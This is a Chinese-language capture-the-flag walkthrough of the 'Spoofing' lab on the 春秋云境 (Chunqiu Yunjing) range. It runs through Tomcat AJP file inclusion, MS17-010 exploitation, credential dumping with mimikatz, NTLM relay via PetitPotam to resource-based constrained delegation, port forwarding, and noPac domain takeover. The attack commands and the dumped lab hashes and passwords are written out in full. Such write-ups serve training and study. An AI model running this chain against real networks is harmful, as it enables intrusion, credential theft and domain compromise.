春秋云境-Spoofing

发表于 分类于
172.22.11.76 ubuntu 外网 tomcat 服务器
172.22.11.45 XR-DESKTOP.xiaorang.lab 存在 MS17-010 漏洞的主机
172.22.11.26 XR-LCM3AE8B.xiaorang.lab WebClient 服务
172.22.11.6 XIAORANG-DC.xiaorang.lab 存在 noPAC 漏洞的域控制器

学习点

一、nopac 利用,在MAQ=0也在项目介绍了怎么利用:https://github.com/Ridter/noPac

二、内网Relay端口转发

Tomcat ajp 文件包含

python ajpShooter.py http://ip:8080/ 8009 /WEB-INF/web.xml read
python ajpShooter.py http://ip:8080/ 8009 /upload/2d8d1657...txt eval

ms17-010

172.22.11.45 ms17

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:48f6da83eb89a4da8a1cc963b855a799:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain    NTLM                              SHA1
--------     ------    ----                              ----
XR-DESKTOP$  XIAORANG  0498507a97312f834d671acdc616ba9d  d12705c4431473386ce8a5a7942a3beffda04f40
yangmei      XIAORANG  25e42ef4cc0ab6a8ff9e3edbbda91841  6b2838f81b57faed5d860adaf9401b0edb269a6f

wdigest credentials
===================

Username     Domain    Password
--------     ------    --------
(null)       (null)    (null)
XR-DESKTOP$  XIAORANG  AM&:=4^NSbVU\Ke-XklyW8eB"?'5ldu/0z9y@Yt3*5I*.>MNcU#>Scjm$q+3EM KoU-C&D\.,-I -,$40cEKUJcI8@yCCvf!b)aP<kkc*3!?*VY\I<xW($)o
yangmei      XIAORANG  xrihGHgoNZQ

kerberos credentials
====================

Username     Domain        Password
--------     ------        --------
(null)       (null)        (null)
xr-desktop$  XIAORANG.LAB  (null)
xr-desktop$  XIAORANG.LAB  AM&:=4^NSbVU\Ke-XklyW8eB"?'5ldu/0z9y@Yt3*5I*.>MNcU#>Scjm$q+3EM KoU-C&D\.,-I -,$40cEKUJcI8@yCCvf!b)aP<kkc*3!?*VY\I<xW($)o
yangmei      XIAORANG.LAB  xrihGHgoNZQ

拿到凭证

XR-DESKTOP$  XIAORANG  0498507a97312f834d671acdc616ba9d
yangmei      XIAORANG  25e42ef4cc0ab6a8ff9e3edbbda91841
yangmei      XIAORANG.LAB  xrihGHgoNZQ

Webdav NTLM Relay

使用 CME 的 webdav 模块检测 webclient 服务

proxychains4 -q crackmapexec smb 172.22.11.0/24 -u yangmei -p xrihGHgoNZQ -M webdav

image-20250528012753816

再使用 CME 的 PetitPotam 模块检测,是否可以进行强制认证

proxychains4 -q crackmapexec smb 172.22.11.6/24 -u yangmei -p xrihGHgoNZQ -M petitpotam

综上,172.22.11.26 存在webclient服务,能打一个NTLM Relay

尝试使用 addcomputer 添加一个机器账号但是发现当前域内的 MAQ=0 ,也就无法新增账号了,但是可以利用现有的机器凭证 XR-DESKTOP$ 去做RBCD

image-20250528021243990

配置端口转发

kali写ssh公钥到入口靶机,然后进行ssh端口转发

ssh [email protected] -D 1080 -R 81:127.0.0.1:80

image-20250528025748783

入口靶机使用iox

./iox fwd -l 80 -r 127.0.0.1:81

image-20250528025820330

ntlmrelayx 开启监听,中继172.22.11.26的认证到域控,设置可控账号 XR-DESKTOP$ 实现RBCD

proxychains4 -q impacket-ntlmrelayx -t ldap://172.22.11.6 --escalate-user 'XR-DESKTOP$' --delegate-access

proxychains4 -q impacket-PetitPotam -u "yangmei" -p "xrihGHgoNZQ" -d xiaorang.lab -dc-ip 172.22.11.6 ubuntu@80/test 172.22.11.26

image-20250528025940107

申请 ST,PTT

proxychains4 -q impacket-getST xiaorang.lab/'XR-DESKTOP$' -hashes ':0498507a97312f834d671acdc616ba9d' -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate Administrator -dc-ip 172.22.11.6

proxychains4 -q impacket-wmiexec xiaorang.lab/[email protected] -k -no-pass -dc-ip 172.22.11.6

image-20250528031417169

抓密码: zhanghui/1232126b24cdf8c9bd2f788a9d7c7ed1

image-20250528032009636

nopac

前面说到 MAQ=0时无法直接利用,需要找到 CreateChild 账户,并使用该账户进行利用

> AdFind.exe -sc getacls -sddlfilter ;;"[CR CHILD]";computer;; -recmute

AdFind V01.62.00cpp Joe Richards ([email protected]) October 2023

Using server: XIAORANG-DC.xiaorang.lab:389
Directory: Windows Server 2019 (10.0.17763.1)
Base DN: DC=xiaorang,DC=lab

dn:DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

...

dn:CN=Computers,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT];[CR CHILD];computer;;S-1-5-21-3598443049-773813974-2432140268-1112
>nTSecurityDescriptor: [DACL] OBJ ALLOW;;[CR CHILD][DEL CHILD];computer;;BUILTIN\Account Operators
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

...

dn:OU=Domain Controllers,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=XIAORANG-DC,OU=Domain Controllers,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=Domain Computers,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=XR-LCM3AE8B,CN=Computers,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;S-1-5-21-3598443049-773813974-2432140268-1112
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=lishuai,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=sunyu,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=chenchen,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=MA_Admin,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=zhanghui,CN=Users,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin

dn:CN=XR-DESKTOP,CN=Computers,DC=xiaorang,DC=lab
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;S-1-5-21-3598443049-773813974-2432140268-1112
>nTSecurityDescriptor: [DACL] OBJ ALLOW;[CONT INHERIT][INHERITED];[CR CHILD];computer;;XIAORANG\MA_Admin


241 Objects returned


也可以直接查询 CN=computers 容器的安全描述符,查看谁对其有 [CR CHILD] 权限:
AdFind.exe -b "CN=Computers,DC=xiaorang,DC=lab" nTSecurityDescriptor -sddl+++

发现MA_Admin 组的 zhanghui 用户对域内 computer container 有能够创建对象的权限,即添加机器账户

python noPac.py xiaorang.lab/zhanghui -hashes :1232126b24cdf8c9bd2f788a9d7c7ed1 -use-ldap -create-child -dc-ip 172.22.11.6

image-20250528035949787

还能使用之前的机器账户 XR-DESKTOP$

python noPac.py xiaorang.lab/'XR-DESKTOP$' -hashes ':03e8d17f4da1797f6b69a9a7a23244c1' -dc-ip 172.22.11.6 --impersonate Administrator -no-add -target-name 'XR-DESKTOP$' -old-hash ':03e8d17f4da1797f6b69a9a7a23244c1' -use-ldap -shell